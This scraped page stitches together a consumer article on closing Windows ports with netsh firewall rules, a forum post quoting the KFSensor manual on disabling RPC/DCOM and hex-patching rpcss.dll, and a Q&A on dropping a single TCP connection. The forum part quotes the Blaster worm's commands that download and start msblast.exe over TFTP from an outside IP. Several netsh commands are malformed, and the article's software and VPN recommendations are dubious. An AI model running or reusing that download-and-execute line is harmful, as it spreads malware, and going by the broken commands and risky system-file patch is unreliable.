Why close ports in Windows?

Through open ports in the Windows operating system, you can become infected with a virus. In this article we will explain how and why to close ports in Windows.

Contents

Close the doors! The call, so familiar to us, to close the door, after entering the room, is very relevant in setting up the computer’s firewall. A huge number of computers on Windows OS are infected with the most dangerous viruses due to the fact that users irresponsibly approach to setting up the firewall. This is motivated primarily by the fact that they install antiviruses that protect them from all viruses.

Unfortunately, installing an antivirus will not protect your computer from all possible threats. Most of the viruses that infect Windows OS penetrate through the open ports of the operating system. These ports are enabled by default in the operating system.

Let us define the concept of “port”, imagine a queue of incoming connections to a computer from various programs with infected viruses. Each person in the queue is assigned a number in order to make it clear where to connect to the operating system. The operating system listens to the port, and if it sees a connection to it, it accepts it. Next thing technology. The virus enters the computer and begins to infect all that is possible. It can also open additional ports so that there are more connections to the computer from the outside and the infection is faster. To remain safe, you need to close the “doors”, that is, give the system a command not to listen to certain ports and reject all connections to them.

The most vulnerable ports in Windows operating systems

Examination of the largest computer infections made it clear that almost 90% of malicious traffic was sent through ports 135, 137, 139 and 445. These ports are used for:

TCP port 445 — for file sharing
TCP port 139 — for remote connection to computer
UDP port 137 — to search for information on other computers
TCP port 135 — to execute the command setting

There are several ways to close ports in Windows. Let’s look at them.

Inexperienced computer users think that closing ports in Windows is very difficult and something can be broken. In fact, there is nothing difficult and at the same time closed ports will allow you to be protected from the threat of hacking into your computer and the loss of important data.

The easiest way, which does not require installing additional software, is to use the Windows command line. They use the command line if any of the settings do not have a graphical interface, and you must tell the system to apply the settings manually.

Before you run the command, you must open a command prompt. To do this, please do the following. Press the key combination Win + R, you will open the program «Run . «, in this program you need to type cmd and press the «OK» button or Enter on the keyboard. Then a black command window will open. Next thing is small, it remains to enter commands, just alternately copy them, paste into the command line and execute. The last digit in the command is the port number that you are closing with this command.

add rule dir = in action = block protocol = tcp localport = 135 name = ”Block1_TCP-135 ″
netsh advfirewall firewall add rule dir = in action = block protocol = tcp localport = 137 name = «Block1_TCP-137 ″
add rule dir = in action = block protocol = tcp localport = 138 name = «Block1_TCP-138 ″
add rule dir = in action = block protocol = tcp localport = 139 name = ”Block_TCP-139 ″
add rule dir = in action = block protocol = tcp localport = 445 name = «Block_TCP-445 ″
netsh advfirewall firewall add rule dir = in action = block protocol = tcp localport = 5000 name = «Block_TCP-5000 ″

Using these commands, you can close the ports about which we wrote above, as well as a no less dangerous port that detects open services, and UDP port 138, which is responsible for NetBIOS.

You can also close ports in Windows using third-party software. The principle of using such software is simple — they scan the system on open ports and offer to close the most vulnerable ports without entering commands. The most popular and easy-to-use software for closing ports in Windows is Windows Doors Cleaner. The principle of using the program is simple: after installation, run the program, and close the ports that it offers.

Make a conclusion

Closed ports do not give a 100% guarantee that your computer will be completely protected from viruses. The best defense is common sense. Install updates of the operating system, do not click on suspicious links on the Internet and do not install programs from unofficial sources. For more complete confidence that you are fully protected, you need to buy VPN. This will allow you to protect yourself from being intercepted by hackers.

Close all ports windows

This forum has migrated to Microsoft Q&A. Visit Microsoft Q&A to post new questions.

Answered by:

Question

Answers

Hey man ,
the thing is the most desireble ports for hackers are the one you cant close so take a look at this:
MS RPC, port 135, DCOM buffer overrun and the Blaster worm
Microsoft’s RPC implementation runs over TCP port 135.
RPC is used by a number of higher level protocols for their transport layer, such as by DCOM.
Vulnerabilities have been found in Microsoft’s RPC implementation and the services it gives access to.
Closing TCP port 135
It is highly desirable to close port 135 and to allow KFSensor to listen to it. Port 135 is consistently on of the most attacked ports on the Internet.

It is not possible to simply disable the RPC service as there are many essential parts of Windows that require RPC to be running even though they do not make network connections.

However Microsoft does not allow RPC to configured to a different port and by default it is bound to all network interfaces making it vulnerable to attack from the Internet.

The following sections describe how to disable services that run on top of RPC, which is desirable in itself, and then to close port 135 itself.

Disable RPC dependent services
Several non-essential services use RPC and these should be disabled.
Shutdown and disable the following services in the services console.
SSDP Discovery Service
Windows Time
Messenger
Remote Registry
System Event Notification
Remote Desktop Help Session Manager
Distributed Transaction Coordinator
Task Scheduler service
COM+ Event System
COM+ System Application
Disable DCOM
Windows DCOM allows applications to share COM functionality over a TCP/IP network. Only a few applications have ever used DCOM and it is due to be phased out by Microsoft. This functionality is turned on by default and uses RPC.

Run «Dcomcnfg.exe» from the Start menu «Run.» item.
Select the following: Component Services -> Computers -> My Computer
Right Click and select the Properties menu item
Select the Default Properties tab
Uncheck «Enable Distributed COM on this computer» option.
Select the Default Protocols tab
Remove «Connection-oriented TCP/IP» from the list of DCOM protocols.
It is also possible do the same directly by editing the registry.
Run «regedt32.exe» from the Start menu «Run.» item.
Select the key «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole»
Set the value «EnableDCOM» to «N».
Select the key «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc»
Edit the value «DCOM Protocols». This may contain a number of strings.
Delete the string «ncacn_ip_tcp»

Configure RPC
It is possible to reconfigure MS RPC to make it safer using a Microsoft configuration tool rpccfg.

To obtain this tool go to www.microsoft.com and enter rpccfg into their site search and download it from the link.

The idea is to get RPC to only bind to the loopback address.

From the DOS command prompt type: rpccfg -l
This will list the available interfaces. Make a note of the number next to the subnet 127.0.0.0, which will probably 1.
Now type: rpccfg -a 1 (or the number you noted before).
Now type: rpccfg -q and only the loopback address should be listed.
To complete the configuration the following setting needs to be added to the Registry:
Run «regedt32.exe» from the Start menu «Run.» item.
Select the key «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs»
Add the string value «ListenOnInternet» and set it to «N».
After performing the above re-boot the machine.

If all the RPC using services have been closed down then port 135 should now be closed and KFSensor will be able to use it.
If port 135 is still bound by RPC then at least one RPC using service is still running.
Either close down the remaining RPC using services, or if they cannot be shut down then there is the option of patching the RPC server.

Patching the RPC server
Microsoft RPC cannot be configured not to listen on a different port to 135.
Instead it is necessary to patch the system to force it not to use the port.
Patching an OS is strictly for advanced users.

The server needs to be patched using a hex editor.
If you do not have a hex editor, use 010 Editor which you can get from this address:
http://www.sweetscape.com/010editor/

The RPC server is implemented in a file called rpcss.dll, however this file is in constant use.
So you will first have to disable it, re-boot, patch it, re-enable it and reboot again.

Make a copy of the file rpcss.dll, as a backup.
Copy the file from \windows\system32\rpcss.dll into one of your own directories, using Windows Explorer.
From the Start menu select Run.
Enter «regedt32» and click on OK.
Expand the tree and select the key:
HKLM\System\CurrentControlSet\Services\RpcSs
Rename the value «ImagePath» to «xImagePath»
Exit regedt32 and re-boot the machine. The machine may take longer than normal to start up and some functionality will no longer be available. The Start bar may longer be visible to it is a good idea to have a short cut to a DOS BOX on the desktop. This will be re-enabled later.
Run your hex editor and open the file «from \windows\system32\rpcss.dll»
Search for the byte sequence «31 00 33 00 35» or the Unicode text «135».
Over-write this byte sequence to «30 00 30 00 30».
This changes the port from 135 to 000, which DCOM will not be able to open.
Save the file in the hex editor.
From the Start menu select Run.
Enter «regedt32» and click on OK.
Expand the tree and select the key:
HKLM\System\CurrentControlSet\Services\ RpcSs
Rename the value «xImagePath» to «ImagePath»
Exit regedt32 and re-boot the machine.
The DCOM server should no longer bind to port 135 and KFSensor should be listening to this port.
Blaster background
On the 16 July 2003 Microsoft released a patch to fix a buffer overrun in its Windows Distributed Component Object Model (DCOM) Remote Procedure Call (RPC) interface.
http://support.microsoft.com/default.aspx?scid=kb;en-us;823980

On the 11 August 2003 a new worm (‘Blaster’) was detected which exploited this vulnerability and rapidly infected large numbers of unpatched machines.
http://www.microsoft.com/security/incident/blast.asp

The Blaster worm attacks a Windows machine by first executing a buffer overrun at port 135 TCP. This causes a vulnerable machine to listen to port 4444 TCP and execute the following command «tftp -i 81.128.17.117 GET msblast.exe». This downloads the worm from the attacking machine. msblast.exe is then executed and the process continues.

Blaster events
If attacked by the Blaster worm you will see the following two events in quick succession.

1. Port 135
Received 1776 bytes containing the binary buffer overrun.
2. Port 4444
Containing the following text:
tftp -i 81.128.81.118 GET msblast.exe
start msblast.exe
msblast.exe

KF Sensor On-Line Manual Contents
the only thing you cant do is rename the imagepath but the other implementaios i havent tried yet, can you tell me if its safe to proceed those the hex thing?
blocking ports not always the only effective measures.
will be looking forward for replies
thx in adavnce
RR

How to close TCP and UDP ports via windows command line

Does somebody knows how to close a TCP or UDP socket for a single connection via windows command line?

Googling about this, I saw some people asking the same thing. But the answers looked like a manual page of netstat or netsh commands focusing on how to monitor the ports. I don’t want answers on how to monitor them (I already do this). I want to close/kill them.

EDIT, for clarification: Let’s say that my server listens TCP port 80. A client makes a connection and port 56789 is allocated for it. Then, I discover that this connection is undesired (e.g. this user is doing bad things, we asked them to stop but the connection didn’t get dropped somewhere along the way). Normally, I would add a firewall to do the job, but this would take some time, and I was in an emergency situation. Killing the process that owns the connection is really a bad idea here because this would take down the server (all users would lose functionality when we just want to selectively and temporally drop this one connection).

17 Answers 17

Yes, this is possible. You don’t have to be the current process owning the socket to close it. Consider for a moment that the remote machine, the network card, the network cable, and your OS can all cause the socket to close.

Consider also that Fiddler and Desktop VPN software can insert themselves into the network stack and show you all your traffic or reroute all your traffic.

So all you really need is either for Windows to provide an API that allows this directly, or for someone to have written a program that operates somewhat like a VPN or Fiddler and gives you a way to close sockets that pass through it.

There is at least one program (CurrPorts) that does exactly this and I used it today for the purpose of closing specific sockets on a process that was started before CurrPorts was started. To do this you must run it as administrator, of course.

Note that it is probably not easily possible to cause a program to not listen on a port (well, it is possible but that capability is referred to as a firewall. ), but I don’t think that was being asked here. I believe the question is «how do I selectively close one active connection (socket) to the port my program is listening on?». The wording of the question is a bit off because a port number for the undesired inbound client connection is given and it was referred to as «port» but it’s pretty clear that it was a reference to that one socket and not the listening port.